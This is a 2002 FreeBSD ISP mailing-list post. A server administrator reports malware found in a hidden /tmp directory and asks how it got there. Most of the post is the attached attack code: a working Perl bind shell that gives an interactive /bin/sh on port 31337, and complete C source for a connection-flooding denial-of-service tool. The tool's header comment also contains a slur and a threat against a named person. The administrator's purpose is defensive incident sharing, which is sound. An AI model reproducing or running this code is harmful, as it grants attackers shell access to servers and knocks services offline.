From owner-freebsd-isp  Wed Sep 25  9: 2: 0 2002
Delivered-To: freebsd-isp@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125])
	by hub.freebsd.org (Postfix) with ESMTP id EAB8337B401
	for <FreeBSD-ISP@FreeBSD.org>; Wed, 25 Sep 2002 09:01:55 -0700 (PDT)
Received: from digitaldaemon.com (digitaldaemon.com [63.105.9.34])
	by mx1.FreeBSD.org (Postfix) with SMTP id 27F2A43E42
	for <FreeBSD-ISP@FreeBSD.org>; Wed, 25 Sep 2002 09:01:55 -0700 (PDT)
	(envelope-from jan@digitaldaemon.com)
Received: (qmail 97993 invoked from network); 25 Sep 2002 15:54:44 -0000
Received: from unknown (HELO digitaldaemon.com) (192.168.0.220)
  by digitaldaemon.com with SMTP; 25 Sep 2002 15:54:44 -0000
Message-ID: <3D91DE68.90206@digitaldaemon.com>
Date: Wed, 25 Sep 2002 12:03:52 -0400
From: Jan Knepper <jan@digitaldaemon.com>
Organization: http://www.digitaldaemon.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.1b) Gecko/20020721
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: FreeBSD ISP <FreeBSD-ISP@FreeBSD.org>
Subject: Found... WingateSUX2.c, a.pl (DoS attacker?)
Content-Type: multipart/mixed;
 boundary="------------000104070505000400040000"
Sender: owner-freebsd-isp@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-isp.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-isp>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-isp>
X-Loop: FreeBSD.org

This is a multi-part message in MIME format.
--------------000104070505000400040000
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hi!

I just returned back into the office from a trip to China and found a 
directory "..." in /tmp, thus "/tmp/..."
In this directory I found the attached junk.

a.pl was running as a perl script which of course has been killed by now.
Next to that I am filtering access to port 31337 now to see if I can 
track where this comes from.

The user and group for the files was for the Apache server.

I figured that someone used an SSL vulnerability to dump some files on 
the server and make it a launchpoint for a DoS attack.
Is this correct?
Has anyone else seen this kind of stuff???

Thanks!
Jan


--------------000104070505000400040000
Content-Type: text/plain;
 name="a.pl"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="a.pl"

#!/usr/bin/perl 
use Socket; 
$port = 31337; 
socket (S,PF_INET,SOCK_STREAM,getprotobyname('tcp')); 
setsockopt (S, SOL_SOCKET, SO_REUSEADDR,1); 
bind (S, sockaddr_in ($port, INADDR_ANY)); 
listen (S, 50); 
while (1){ 
accept (X, S); 
if (!($pid = fork)){ 
if(!defined $pid){exit(0);} 
open STDIN,"<&X"; 
open STDOUT,">&X"; 
open STDERR,">&X"; 
exec("/bin/sh -i"); 
close X;}} 

--------------000104070505000400040000
Content-Type: text/plain;
 name="WebgateSUX2.c"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="WebgateSUX2.c"


/* ********** WebgateSUX.c by Himika **********
 *
 * 	FOR PRIVATE USE ONLY!!!
 *
 * This simple program establishes lots of connections
 * to a target host and keeps them alive until you make
 * it close them. It takes following args:
 *
 * ./WebgateSUX <server> <number of connections> [port]
 *
 * where <server> is hostname of the victim;
 * <number of connections> is an integer defining how many
 * connections do you want to establish to the target;
 * [port] as optional numerical parameter specifies port
 * to use for establish connections to the host. By default
 * it's 6667 for obvious reasons:)
 *
 * Note: You can't establish as many connections as you want.
 * You're restricted to the number of file descriptors your
 * OS supports. On Win98 you can create only about 70 connections.
 * On most Linux boxes you're limited to 400-500, depending
 * on the amount of other running applications.
 * Currently, this DoS tools uses only TCP connections.
 *
 *
 * Blames to: abo - You'll be soon dead... fuckin gay.
 *
 * Greets to: everyone who helps in the war against him.
 *
 */


#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>


#define MAX_CONNECTIONS	1000

int main(int argc, char *argv[]) {

int conns, sock[MAX_CONNECTIONS], i, c, port;
struct hostent *host;
struct sockaddr_in server;

if (argc < 3 || argc > 4) {
   printf("Usage: %s <server> <# of connections> [port]\n", argv[0]);
   exit(1);
}

if ((host = gethostbyname(argv[1])) == 0) {
   herror("gethostbyname");
   exit(1);
}

conns = atoi(argv[2]);

if (conns > MAX_CONNECTIONS || conns < 0) {
    printf("Please select connections number between 0 and 1000.\n");
    printf("This version supports up to 1000 simultaneous connections.");
    printf("If you desire creating more than 1000, then just edit and fix the source code. Sorry homez, coders should use script-kiddies protections.\n");
    exit(1);
  }

if (argv[3])
port = atoi(argv[3]);

server.sin_family = AF_INET;
server.sin_addr = *((struct in_addr *)host->h_addr);
if (argv[3])
server.sin_port = htons(port);
else
server.sin_port = htons(6667);
memset(&server.sin_zero, 0, 8);

printf("Attacking %s...\n", argv[1]);

while(1) {
for (i=0;i < conns;i++) {

 if ((sock[i] = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
    i--;
    perror("socket");
    continue;
  }

 if (connect(sock[i], (struct sockaddr *) &server, sizeof(struct sockaddr)) == -1) {
    perror("connect");
    i--;
    continue;
  }

}

for (c=i;i >= 0;i--)
send(sock[i], "USER aaa aaa aaa aaa\nNICK aaaaaa\nQUIT\n", 40, 0);

for (;c >= 0;c--)
close(sock[c]);

printf(".");
}
}

--------------000104070505000400040000--


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-isp" in the body of the message